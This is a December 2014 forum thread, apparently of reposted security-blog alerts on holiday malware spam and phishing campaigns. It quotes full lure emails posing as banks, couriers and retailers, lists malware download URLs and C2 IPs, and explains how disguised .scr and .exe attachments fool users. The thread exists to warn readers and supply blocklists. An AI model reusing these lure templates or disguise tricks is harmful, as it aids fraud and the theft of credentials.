Seasonal scams like these are a perennial scourge of the holidays, mainly because the methods they employ are reliably successful. Crooks understand that it’s easier to catch would-be victims off-guard during the holidays. This goes even for people who generally know better than to click on links and attachments in emails that spoof trusted brands and retailers, because this is a time of year when many people are intensely focused on making sure their online orders arrive before Dec. 25:
This Asprox malware email poses as a notice about a wayward package from a WalMart order.
>> http://krebsonsecurity.com/wp-content/uploads/2014/12/wm-asprox-600x308.png
According to Malcovery*, a company that closely tracks email-based malware attacks, these phony “order confirmation” spam campaigns began around Thanksgiving, and use both booby-trapped links and attached files in a bid to infect recipients’ Windows PCs with the malware that powers the Asprox spam botnet. Asprox is a nasty Trojan that harvests email credentials and other passwords from infected machines, turns the host into a zombie for relaying junk email...
Target is among the many brands being spoofed by Asprox this holiday season:
>> http://krebsonsecurity.com/wp-content/uploads/2014/12/tg-asprox-600x373.png
... do not click the embedded links or attachments..."

* http://blog.malcovery.com/blog/asprox-malware-threat-targets-holiday-shoppers
Dec 3, '14

:fear: :mad:

AplusWebMaster
2014-12-04, 18:04
FYI...

Something evil on 46.161.30.0/24
- http://blog.dynamoo.com/2014/12/something-evil-on-4616130024.html
4 Dec 2014 - "The IP address range of 46.161.30.0/24 (KolosokIvan-net) appears to be dedicated purely to providing phone-home servers for TorrentLocker or some other similar malware. In the past, this IP range has hosted various sites which have moved off... There are no legitimate sites in this network range, so I strongly recommend that you -block- the entire 46.161.30.0/24 range."
(More detail at the dynamoo URL above.)
___

Fake 'Quickbooks intuit unpaid invoice' SPAM - PDF malware
- http://myonlinesecurity.co.uk/quickbooks-intuit-unpaid-invoice-fake-pdf-malware/
4 Dec 2014 - "'Quickbooks intuit unpaid invoice' with a zip attachment pretending to come from Elena.Lin@ intuit .com <Elena.Lin@ quickbooks .com> is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Please review the attached invoice and pay this invoice at your earliest convenience. Feel free to contact us if you have any
questions.
Thank you.

4 December 2014 : invoice72.zip: Extracts to: invoice72.scr
Current Virus total detections: 6/55* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/300feec373535aa4fabfd8a157f1e5afa37af98f6a7d432b50078e16d77480c1/analysis/1417726300/
... Behavioural information
TCP connections
80.248.222.238: https://www.virustotal.com/en/ip-address/184.95.37.110/information/
198.58.84.150: https://www.virustotal.com/en/ip-address/198.58.84.150/information/
UDP communications
198.27.81.168: https://www.virustotal.com/en/ip-address/198.27.81.168/information/
192.95.17.62: https://www.virustotal.com/en/ip-address/192.95.17.62/information/
___

Fake 'FedEx Delivery' confirmation - phishing 419 SCAM
- http://myonlinesecurity.co.uk/fedex-delivery-notification-confirmation-phishing-419-scam/
4 Dec 2014 - "'FedEx Delivery Notification. (Confirmation)' pretending to come from FedEx Courier Delivery <FedExdelivery@ FedEx .com> is a phishing scam. When I first saw these emails start to come in, I thought it was a follow 0n to the current malware spreading campaign Fedex Unable to deliver your item, #00486182 malware but no, it is a pure and simple phishing scam trying to get you to voluntarily give your details. It is most likely a 419 scam which will ask for a fee to expedite the delivery. Just look at all the spelling and grammar mistakes in the email, but of course most victims just don’t read emails closely, just blindly follow instructions and do what is asked without thinking. Email looks like:

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/12/fedex_delivery_phish.jpg

... it appears to come from a friend or is more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day. Or whether it is a straight forward attempt, like this one, to steal your personal, bank, credit card or email and social networking log in details..."
___

Fake Air Canada emails with ticket and flight confirmation leads to malicious ZIP file
- http://blog.mxlab.eu/2014/12/03/new-fake-air-canada-emails-with-ticket-and-flight-confirmation-leads-to-malicious-zip-file/
Dec 3, 2014 - "... intercepted a new trojan distribution campaign by email with the subjects like:
Order #70189189901 successfully – Ticket and flight details
Order #70189101701 paid – E-ticket and flight details
This email is sent from the -spoofed- address “Aircanada .com” <tickets@ aircanada .com>” and has the following body:
Dear client,
Your order has been successfully processed and your credit card charged.
ELECTRONIC TICKET – 70189101701
FLIGHT – QB70189101701CA
DATE / TIME – Dec 4th 2014, 15:30
ARRIVING – Quebec
TOTAL PRICE / 575.00 CAD
Your ticket can be downloaded and printed from the following URL: ...
hxxps ://www.aircanada .com/travelInformation/viewOrderInfo.do?ticket_number=70189101701& view_pdf=yes
For information regarding your order, contact us by visiting our website: ...
Thank you for choosing Air Canada

The embedded URL does -not- point the browser to the real web site address but to hxxp ://ravuol .com/wp-content/plugins/revslider/temp/update_extract/revslider/pdf_ticket_QB70189189901CA.zip. Once this file is extracted you will have the 209 kB large file pdf_ticket_QB70189189901CA.pif. The trojan is known as Trojan.MalPack or a variant of Win32/Injector.BQPL. This trojan has the ability to fingerprint the system, start a server listening on a local machine, create Zeus mutexes, installs itself to autorun, modifies local firewall and policies. At the time of writing, 2 of the 52* AV engines did detect the trojan at Virus Total..."
* https://www.virustotal.com/en/file/8aba09320c5a5844ceb64ef06624eda221578667a1fa59feb3b2c94aabae96fb/analysis/

ravuol .com / 192.232.218.114: https://www.virustotal.com/en/ip-address/192.232.218.114/information/

:mad: :fear:

AplusWebMaster
2014-12-05, 14:49
FYI...

Fake Voicemail SPAM - wav malware
- http://myonlinesecurity.co.uk/stuartclark146-voicemail-message-01438351556night-message-fake-wav-malware/
5 Dec 2014 - "'Voicemail Message (01438351556>Night Message) From:01438351556' pretending to come from stuartclark146@ gmx .com with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:

IP Office Voicemail redirected message

5 December 2014: voicemsg.wav.zip : Extracts to: voicemsg.exe
Current Virus total detections: 3/55* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper wav ( sound) file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/a8d7a7b4c76fa4456b2aa0fd0107ef500382075a56b93564af037dd322232a9f/analysis/1417779780/
___

Fake Remittance Advice SPAM
- http://blog.dynamoo.com/2014/12/k-j-watking-co-fake-remittance-advice.html
5 Dec 2014 - "... The spam comes with an Excel spreadsheet which contains a malicious macro.
Some sample spams are as follows:
From: Brenton Glover
Date: 5 December 2014 at 07:20
Subject: Remittance Advice for 430.57 GBP
Please find attached a remittance advice for recent BACS payment.
Any queries please contact us.
Brenton Glover
Senior Accounts Payable Specialist
K J Watking & Co

I have seen two versions of these, neither of which are detected as malicious by any vendors [1] [2]. Each spreadsheet contains a different but similar malicious macro... which then download a binary... Recommended blocklist:
194.146.136.1
84.92.26.50
79.137.227.123
124.217.199.218 "
1] https://www.virustotal.com/en/file/84f5c7cca1d8d0d35dbe541a406a8ff188b46624248c60214f00d91faf219d66/analysis/1417773044/

2] https://www.virustotal.com/en/file/a92ed1870f948dfe0b57df27389185157b0d4b28805e06989a40fde0147267b1/analysis/1417773050/

- http://myonlinesecurity.co.uk/k-j-watking-co-remittance-advice-excel-malware/
5 December 2014 : BAC_002163F.xls (253KB) - Current Virus total detections: 0/55*
* https://www.virustotal.com/en/file/66ed083beb750b7c2d65210607f52ff2136dbdb9b9b89dfe88fdbef3c9cf826e/analysis/1417779426/
5 December 2014 : BAC_644385B.xls (290KB) - Current Virus total detections: 0/55**
** https://www.virustotal.com/en/file/a92ed1870f948dfe0b57df27389185157b0d4b28805e06989a40fde0147267b1/analysis/1417779139/

- http://blog.mxlab.eu/2014/12/05/email-remittance-advice-for-245-58-gbp-contains-malicious-xls-file/
Dec 5, 2014
> https://www.virustotal.com/en/file/367b3c188d2dc322c03de0204c66d4c7217a998c879c9ad471ba8e1f8db6a2c4/analysis/1417768835/
___

Fake Order/Invoice SPAM - malicious .doc attachment
- http://blog.dynamoo.com/2014/12/mathew-doleman-lightmoorhomescouk-spam.html
5 Dec 2014 - "This -spam- came through into my mailbox horribly mangled and needed some assembly to make it malicious (everything was in a Base 64 attachment). After some work it appears to have a malicious Word document attached.
From: Mathew Doleman [order@ lightmoorhomes .co .uk]
Date: 5 December 2014 at 08:32
Subject: Order no. 98348936010
Thank you for using our services!
Your order #98348936010 will be shipped on 08-12-2014.
Date: December 04, 2014
Price: 177.69
Payment method: Credit card
Transaction number: OVFTMZERLXVNPXLPXB
Please find the detailed information on your purchase in the attached file (2014-12-4_12-32-28_98348936010.doc)
Best regards,
Sales Department
Mathew Doleman
+07966 566663

The attachment is 2014-12-4_12-32-28_98348936010.doc which looks like an old-style .DOC file, but is actually a newer format .DOCX document, which is poorly detected by AV vendors* ... Some investigation shows that it contains a malicious macro... The macro downloads a file from http ://hiro-wish .com/js/bin.exe which is completely undetected by any AV vendor** at present... The VirusTotal report** shows it phoning home to:
46.4.232.200 (Dmitry Zheltov / Hetzner, Germany)
Recommended blocklist:
203.172.141.250
46.4.232.200
74.208.11.204
hiro-wish .com "
* https://www.virustotal.com/en/file/cbb8823189d908b7f11f4c51da179a0a43a93da4ecff6e83e2db7ab99a444717/analysis/1417776108/

** https://www.virustotal.com/en/file/e167ed90258a88c8f63338a76d5d92feb6f97702fba6c99e9c3300014fcc08b3/analysis/1417775973/
___

Fake 'Package delivery failed' SPAM - PDF malware
- http://myonlinesecurity.co.uk/package-delivery-failed-fake-pdf-malware/
5 Dec 2014 - "'Package delivery failed' pretending to come from Canada Post with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
From: Canada Post [mailto:shipping@ canadapost .ca]
Sent: December 5, 2014 2:31
To: e-Bills – [redacted]
Subject: Package delivery failed
Image removed by sender.
Dear customer,
A delivery attempt has been made on December 3rd, 2014.
The delivery failed because nobody was present at the receiver’s address.
Redelivery can be arranged by visiting our nearest office and presenting a printed copy of the shipping invoice.
TRACKING Number: 3765490000465274
Originating from : RICHMOND
The shipping invoice, necessary for the redelivery arrangements can be automatically downloaded by visiting the tracking section, in our website: ...

5 December 2014: canpost_3765490000465274_trk.zip: Extracts to:
canpost_3765490000465274_trk.pif . Current Virus total detections: 5/55*
... All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/45469fa9aa80014b868ac02fc18997fcad8a25ee7b758cd5358897e126c81929/analysis/1417725574/
___

Halifax phish...
- http://myonlinesecurity.co.uk/halifax-phishing/
5 Dec 2014 - "This Halifax phishing attempt starts with an email saying 'Your Account' pretending to come from Halifax <update@halifax .co .uk> is one of the latest phish attempts to steal your Bank, credit card and personal details. This one only wants your personal details,and your credit card and bank details. Many of them are also designed to specifically steal your email, facebook and other social network log in details as well:
1] http://myonlinesecurity.co.uk/wp-content/uploads/2014/12/halifax_phish_email.jpg
...
2] http://myonlinesecurity.co.uk/wp-content/uploads/2014/12/halifax_fake-site.jpg
... the phishers try to validate your details to make sure that you are entering “genuine ” information. They make sure that the bank account numbers have the correct number of digits and that the credit card numbers have the correct number of digits and format..."

:mad: :fear:

AplusWebMaster
2014-12-08, 13:55
FYI...

Fake Invoice SPAM - malicious doc attachment
- http://blog.dynamoo.com/2014/12/soo-sutton-invoice-224245-from-power-ec.html
8 Dec 2014 - "... this -fake- invoice comes with a malicious Word document attached.
From: soo.sutton966@ powercentre .com
Date: 8 December 2014 at 10:57
Subject: INVOICE 224245 from Power EC Ltd
Please find attached INVOICE number 224245 from Power EC Ltd

Attached are one of two Word documents -both- with the name 224245.doc but with slightly different macros. Neither are currently detected by any AV vendors [1] [2]. Inside the DOC is one of two malicious macros... which then downloads an executable from one of the following locations:
http ://aircraftpolish .com/js/bin.exe
http ://gofoto .dk/js/bin.exe
This file is then saves as %TEMP%\CWRSNUYCXKL.exe and currently has zero detections at VirusTotal. The ThreatExpert report shows that it connects to:
203.172.141.250 (Ministry of Education, Thailand)
74.208.11.204 (1&1 Internet, US)
According to the Malwr report this executable drops a DLL with a slightly better detection rate of 5/53*.
Recommended blocklist:
203.172.141.250
74.208.11.204
aircraftpolish .com
gofoto .dk "
1] https://www.virustotal.com/en/file/638c38749b79a38a18d641e3b170e7feeebba21ab3b31ca2d98c5abc5832a150/analysis/1418035603/

2] https://www.virustotal.com/en/file/84d0d1b9544ae8862792796a7ef06e5924919c8ac9fe8b1fb495a4e2df98ed22/analysis/

* https://www.virustotal.com/en/file/8826cc73859b551a7f63db428e13924deeb969b45a7ac8d2cc9b6a4018511c88/analysis/1418037172/

- http://myonlinesecurity.co.uk/please-find-attached-invoice-number-224244-power-ec-ltd-word-doc-malware/
8 Dec 2014
___

Fake 'Transaction confirmation' SPAM - doc malware
- http://myonlinesecurity.co.uk/shipping-status-transaction-confirmation-fake-word-doc-malware/
8 Doc 2014 - "'Shipping status: Transaction confirmation' with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The subjects include (all having random numbers, senders, sales clerks names, telephone numbers, order numbers and amounts. Most pretend to come from sale@ or order@ < random company> )
Shipping status: Transaction confirmation: 77951286043
Order info: 50664959001
Payment info: 22908714125
Payment confirmation: 6322896965

They look like:
Shipping status: Transaction confirmation: 77951286043Greetings,
Your order #77951286043 will be shipped on 16.12.2014.
Date: December 08, 2014. 01:27pm
Price: £163.10
Transaction number: 43595D828F1A5A
Please find the detailed information on your purchase in the attached file order2014-12-08_77951286043.zip
Yours truly,
Sales Department
Keisha Konick ...
-or-
Hello,
Your order #50664959001 will be shipped on 17-12-2014.
Date: December 08, 2014. 01:49pm
Price: £181.71
Transaction number: 1E51D75638EEDA4499
Please find the detailed information on your purchase in the attached file item2014-12-08_50664959001.zip
Kind regards,
Sales Department
Sanjuanita Mandeville ...

Every single attachment received so far today (and there are hundreds) has a different file # so it is difficult to get a viable detection rate at Virus total. The zip attachment extracts to another zip & then to a scr file with an icon looking like it is a word doc.
8 December 2014: order2014-12-08_77951286043.zip: Extracts to: sale2014-12-08_97164185939.scr
Current Virus total detections: 3/55* .
8 December 2014: item2014-12-08_24831482215.zip: Extracts to: item2014-12-08_79359848638.scr
Current Virus total detections: 5/55**
This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper word doc file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/89be5f270a6a3db81b3e0bb84a1bbcfd228d12454eedd7537a5aa38361542f3c/analysis/1418050446/
... Behavioural information
TCP connections
157.56.96.55: https://www.virustotal.com/en/ip-address/157.56.96.55/information/
213.186.33.19: https://www.virustotal.com/en/ip-address/213.186.33.19/information/
95.101.0.96: https://www.virustotal.com/en/ip-address/95.101.0.96/information/
195.60.214.11: https://www.virustotal.com/en/ip-address/195.60.214.11/information/
217.16.10.3: https://www.virustotal.com/en/ip-address/217.16.10.3/information/
74.208.11.204: https://www.virustotal.com/en/ip-address/74.208.11.204/information/

** https://www.virustotal.com/en/file/8c968020120ca70d9d56102d3576d0d9e562a57413b7d437d9b4019a8a96b02f/analysis/1418050480/
... Behavioural information
TCP connections
191.232.80.55: https://www.virustotal.com/en/ip-address/191.232.80.55/information/
213.186.33.19: https://www.virustotal.com/en/ip-address/213.186.33.19/information/
95.101.0.90: https://www.virustotal.com/en/ip-address/195.60.214.11/information/
195.60.214.11: https://www.virustotal.com/en/ip-address/195.60.214.11/information/
217.16.10.3: https://www.virustotal.com/en/ip-address/217.16.10.3/information/
74.208.11.204: https://www.virustotal.com/en/ip-address/74.208.11.204/information/
___

Fake HSBC Advising SPAM - leads to malware
- http://blog.mxlab.eu/2014/12/08/fake-email-from-hsbc-advising-service-leads-to-malware/
Dec 8, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “Payment Advice – Advice Ref:[GB659898] / CHAPS credits” (number in subject will vary). This email is sent from the spoofed address “HSBC Advising Service <advising.service@ hsbc .com>” and has the following body:
Sir/Madam,
Please download document from dropbox, payment advice is issued at the request of our customer. The advice is or your reference only.
Download link: ...
Yours faithfully,
Global Payments and Cash Management
HSBC ...

In this sample, the embedded URl directs us to hxxp ://paparellalogistica .it/banking/document.php where the file documentXXX.zip (name contains number that will vary) is downloaded.The trojan is known as Upatre-FAAJ!BADD639EC640, HB_Arkam or Virus.Win32.Heur.c. The trojan will create a new service gtpwz.exe on the system, modify some Windows registry and can connect to the IP 62.210.204.149 on port 33294 and 33321 for outbound traffic. At the time of writing, 5 of the 53* AV engines did detect the trojan at Virus Total..."
* https://www.virustotal.com/en/file/2ed5903942b5299ea69183aa040343338d220b66742c510c0895766fe0b70b9a/analysis/
... Behavioural information
TCP connections
62.210.204.149: https://www.virustotal.com/en/ip-address/62.210.204.149/information/
188.132.235.180: https://www.virustotal.com/en/ip-address/188.132.235.180/information/
UDP communications
208.97.25.20: https://www.virustotal.com/en/ip-address/208.97.25.20/information/
208.97.25.6: https://www.virustotal.com/en/ip-address/208.97.25.6/information/

:fear: :mad:

AplusWebMaster
2014-12-09, 13:29
FYI...

Something evil on 5.196.33.8/29
- http://blog.dynamoo.com/2014/12/something-evil-on-519633829.html
9 Dec 2014 - "This Tweet* from @Kafeine about the Angler EK drew my attention to a small block of OVH UK addresses of 5.196.33.8/29 which appear to be completely dedicated to distributing malware.
Specifically, VirusTotal lists badness on the following IPs:
5.196.33.8: https://www.virustotal.com/en/ip-address/5.196.33.8/information/
5.196.33.9: https://www.virustotal.com/en/ip-address/5.196.33.9/information/
5.196.33.10: https://www.virustotal.com/en/ip-address/5.196.33.10/information/
There are also some doubtful looking IP addresses on 5.196.33.15** which may we have a malicious purpose... suggest that you treat them as malicious.
Recommended blocklist:
5.196.33.8/29 ..."
(Long list at the dynamoo URL at the top of this post.)
* https://twitter.com/kafeine/status/541550193649680385

** https://www.virustotal.com/en/ip-address/5.196.33.15/information/
___

Fake 'UPS Customer Service' SPAM - PDF malware
- http://myonlinesecurity.co.uk/ups-customer-service-fake-pdf-malware/
9 Dec 2014 - "'UPS Customer Service' pretending to come from UPS Customer Service [mailto:upsdi@ ups .com] is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
From: UPS Customer Service [mailto:upsdi@ ups .com]
Sent: December 9, 2014 11:25
To: [redacted]
Subject: [SPAM] UPS Customer Service
IMPORTANT DELIVERY
Dear [redacted]
You have received an important delivery from UPS Customer Service.
Please pick up the ePackage at the following Web address:
The ePackage will expire on Thursday December 11, 2014, 00:00:00 EDT
…………………………………………………………….
HOW TO PICK UP YOUR ePackage
* If the Web address above is highlighted, click on it to open a browser window. You will automatically be taken to the ePackage.
* If the Web address above is not highlighted, then follow these steps:
– Open a web browser window.
– Copy and paste the entire Web address into the ‘location’ or ‘address’ bar of the browser.
– Press enter.
Once you arrive at the ePackage web page, you can access the attached files and/or private message.
…………………………………………………………….
If you require assistance please contact UPS Customer Service.
Please note: This e-mail was sent from an auto-notification system that cannot accept incoming e-mail. Please do not reply to this message.
This e-mail is intended for the addressee shown. It contains information that is confidential and protected from disclosure. Any review,
dissemination or use of this transmission or its contents by persons or unauthorized employees of the intended organizations is strictly prohibited.
__________________________________
Delivered by UPS ePackage

9 December 2014: ePackage_12092014_42.pdf.zip: Extracts to: ePackage_12092014_42.pdf.scr
Current Virus total detections: 0/56* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/8be655497ded041cc896788e543e5dad24a5dea518f9d869e376948b004c2e71/analysis/1418149697/
... Behavioural information
TCP connections
54.225.211.214: https://www.virustotal.com/en/ip-address/54.225.211.214/information/
194.150.168.70: https://www.virustotal.com/en/ip-address/194.150.168.70/information/
___

Phishing SCAM - 'Your Email Address Transmitting Viruses'
- http://www.hoax-slayer.com/email-address-transmitting-viruses-phishing.shtml
Dec 9, 2014 - "... The email is -not- from any email administrator or service provider. It is a phishing scam designed to steal your account login details via a fake login form. If you click the link and login on the -fake- site, your email account may be hijacked by criminals and used for spam and scam campaigns... Example:

Subject: Take note [email address removed]: Your email address will be terminated now
Dear [email address removed]
Your email address (removed) has been transmitting viruses to our servers and will be deactivated permanently if not resolved.
You are urgently required to sanitize your email or your access to email services will be terminated
Click here now to scan and sanitize your e-mail account
Note that failure to sanitize your email account immediately will lead to permanent deactivation without warning.
We are very sorry for the inconveniences this might have caused you and we assure you that everything will return to normal as soon as you have done the needful.
Admin

According to this email, which claims - rather vaguely - to be from 'Admin', your email has been transmitting viruses to the sender's servers. The email warns that your account will be deactivated permanently if you do not resolve the issue. The message instructs you to 'urgently' click a link to run a scan and 'sanitize your e-mail account'... Clicking the link takes you to a fraudulent webpage that includes a stolen Norton Antivirus logo and a login box (See screenshot below*). The page instructs you to login with your email address and password to run a 30 second scan. After 'logging in', a 'Please wait - scanning' message will be displayed for a few seconds. Finally, a 'Scan Complete' message will be shown. At this point, you may believe that the viruses have been removed and you have successfully resolved the issue... however, the criminals behind the scam can collect your login details and hijack your real email account. They may use the hijacked account to launch further spam and scam campaigns in your name..."
* http://www.hoax-slayer.com/images/email-address-tansmitting-viruses.jpg

:mad: :fear:

AplusWebMaster
2014-12-10, 13:52
FYI...

Fake 'Remittance Advice' SPAM - malicious attachment
- http://blog.dynamoo.com/2014/12/spam-remittance-advice-from-anglia.html
10 Dec 2014 - "This spam email does not come from Anglia Engineering Solutions Ltd but instead comes from a criminally-operated botnet and has a malicious attachment.
From: Serena Dotson
Date: 10 December 2014 at 10:33
Subject: Remittance Advice from Anglia Engineering Solutions Ltd [ID 334563N]
Dear ,
We are making a payment to you.
Please find attached a copy of our remittance advice, which will reach your bank account on 11/12/2014.
If you have any questions regarding the remittance please contact us using the details below.
Kind regards
Serena Dotson
Anglia Engineering Solutions Ltd ...

The sender's name, ID number and attachment name vary from spam email to spam email. It comes with one of two Excel attachments, both of which are malicious but are undetected by any AV product [1] [2] which contains one of two malicious macros... which attempts to download an executable from the following locations:
http ://217.174.240.46:8080/stat/lld.php
http ://187.33.2.211:8080/stat/lld.php
This file is downloaded as test.exe and is then copied to %TEMP%\LNUDTUFLKOJ.exe. This executable has a VirusTotal detection rate of just 1/55*. The ThreatTrack report... shows attempted connections to the following IPs:
194.146.136.1 (PE "Filipets Igor Victorovych", Ukraine)
84.92.26.50 (PlusNet, UK)
87.106.246.201 (1&1, Germany)
Traffic to 194.146.136.1 is also confirmed by VirusTotal. The Malwr report shows the same traffic. The payload is most likely Dridex, a banking trojan. I recommend that you block traffic to the following IPs:
194.146.136.1
84.92.26.50
87.106.246.201
217.174.240.46
187.33.2.211 "
1] https://www.virustotal.com/en/file/5df525cbd9ab794673e6ce705f3706077704837e115d67788e673b18a303b578/analysis/1418208470/

2] https://www.virustotal.com/en/file/1e0f0179fd559c96b5aa9b135a32a6527bdf81694f8b27599e5fb6d3c660ad94/analysis/1418208468/

* https://www.virustotal.com/en/file/c92200fd311abe6f1e8422781f3eefec7ef2791ab0f43e4552bd27488091da94/analysis/1418208856/

- http://myonlinesecurity.co.uk/remittance-advice-anglia-engineering-solutions-ltd-excel-xls-malware/
10 Dec 2014
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/12/Anglia-Engineering-Solutions.jpg

* https://www.virustotal.com/en/file/1e0f0179fd559c96b5aa9b135a32a6527bdf81694f8b27599e5fb6d3c660ad94/analysis/1418209362/

** https://www.virustotal.com/en/file/5df525cbd9ab794673e6ce705f3706077704837e115d67788e673b18a303b578/analysis/1418209779/
___

Fake JPMorgan Chase – ACH – Bank account info SPAM – PDF malware
- http://myonlinesecurity.co.uk/gre-project-accounting-jpmorgan-chase-ach-bank-account-information-form-fake-pdf-malware/
10 Dec 2014 - "'ACH – Bank account information form' pretending to come from random names at jpmchase.com with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Please fill out and return the attached ACH form along with a copy of a voided check.
Jules Hebert,
JPMorgan Chase
GRE Project Accounting
Vendor Management & Bid/Supervisor
Fax-602-221-2251
Jules.Hebert@ jpmchase .com
GRE Project Accounting

10 December 2014: Check_Copy_Void.zip: Extracts to: Check_Copy_Void.scr
Current Virus total detections: 5/56* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/37ca2089e469332ff3400712726cdb85f4e07ef84d245e9d68b9ed1276dac0d7/analysis/1418238116/
... Behavioural information
TCP connections
202.153.35.133: https://www.virustotal.com/en/ip-address/202.153.35.133/information/
213.175.194.96: https://www.virustotal.com/en/ip-address/213.175.194.96/information/
UDP communications
107.23.150.92: https://www.virustotal.com/en/ip-address/107.23.150.92/information/
___

Fake 'PRODUCT ENQUIRY' SPAM - jpg malware
- http://myonlinesecurity.co.uk/re-product-enquiry-fake-jpg-malware/
10 Dec 2014 - "'RE: PRODUCT ENQUIRY' coming from a random company with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Hello,
We are very interested in your product line. We got your profile from sister-companies. Can you please email me the list of all your Class A products and their prices? How much is the minimum order for shipping? What is the mode of payment and can you ship to Stockholm (SWEDEN)?
Please refer to the attached photo in my email. I was informed that this was purchased from your company. I would also like to order this product. Can you send the product code in your reply.
Thank you very much
Stven Clark
Lindhagensgatan 90,
112 18 Stockholm,
SWEDEN…

10 December 2014: Product Image NO. 1_jpeg…………….. (1).7z:
Extracts to: Product Image NO. GXD46474848494DHW_jpeg…………….. (1).exe
Current Virus total detections: 2/56* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper jpg file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/d723f44d1d2943966f9ad4e5529af1816bfb51f261e68304241255a68f8c15d7/analysis/1418220978/
___

85% of website scams - China
- http://www.theregister.co.uk/2014/12/10/chinese_responsible_for_85_per_cent_of_website_scams/
10 Dec 2014 - "Chinese internet users are behind 85 per cent of -fake- websites, according to a semi-annual report [PDF*] from the Anti-Phishing Working Group (APWG). Of the 22,679 -malicious- domain registrations that the group reviewed, over 19,000 were registered to servers based in China. This is in addition to nearly 60,000 websites that were hacked in the first half of 2014 and then used to acquire people's details and credit card information while pretending to offer real goods or services. Chinese registrars were also the worst offenders, with nine of the top ten companies with the highest percentages of phished domains based in China. Dot-com domains are the most popular for phishing sites, being used in 51 per cent of cases, but when it comes down to the percentage of phished domains against the number of domains under that registry, the clear winner is the Central African Republic's dot-cf, with more than 1,200 phished domain out of a total of 40,000 (followed by Mali's dot-ml, Palau's dot-pw and Gabon's dot-ga). Despite concerted efforts to crack down on fake websites, little improvement was made on the last report in terms of uptime (although it is significantly lower than when the group first started its work back in 2010). The average uptime of a phishing site was 32 hours, whereas the median was just under 9 hours. As for the phishers' targets: Apple headed the list for the first time being used in 18 per cent of all attacks, beating out perennial favorite PayPal with just 14 per cent. Despite some fears, the introduction of hundreds of new generic top-level domains has not led to a noticeable increase in phishing, according to the report. The authors posit that this may because of the higher average price of new gTLDs, although they expect the new of new gTLD phished domains to increase as adoption grows and websites are compromised. Around 20 per cent of phishing attacks are achieved through hacking of vulnerable shared hosting providers..."
* http://docs.apwg.org/reports/APWG_Global_Phishing_Report_1H_2014.pdf
___

Zeus malware thru browser warning: social engineering...
- http://blog.phishlabs.com/zeus-malware-distributed-through-browser-warning-social-engineering-at-its-finest
Dec 5, '14 - "Zeus malware continues to plague the Internet with distributions through spam emails and embeds in compromised corners of the web – all designed to exploit unsuspecting consumers. PhishLabs’ R.A.I.D. (Research Analysis and Intelligence Division) recently observed the Zeus malware being distributed through an alarmingly convincing browser warning that prompts viewers to download and “restore settings”... designed to manipulate viewers so that they believe the alert is based on security preferences that he or she has previously set up. The message creates a sense of urgency and fear, warning of “unusual activity”... Generally speaking, grammar and spelling are often indicators of fake or malicious requests that lead to malware but cybercriminals have caught on to this vulnerability and stepped up their game. Although it is not perfect, the warning observed in this case was much more accurate than what we usually see. The warning states:
"REPORTED BROWSER ONLINE DOCUMENT FILE READER WARNING”. We have detected unusual activities on your browser and the Current Online Document File Reader has been blocked base on your security preferences. It is recommended that you update to the latest version available in order to restore your settings and view Documents."
Browser warning leading to Zeus malware download:
> http://info.phishlabs.com/hs-fs/hub/326665/file-2183047529-png/blog-files/Zeus_Browser_Warning.png
The fake browser warning requires the user to click the "Download and Install" button. Once clicked, the victim is redirected to a site that downloads the Zeus executable (Zbot) malware. The R.A.I.D was able to track the malware back to the Zeus control panel...
Zeus (Zbot) malware control panel:
> http://info.phishlabs.com/hs-fs/hub/326665/file-2184127607-png/blog-files/Zeus_Control_Panel..png
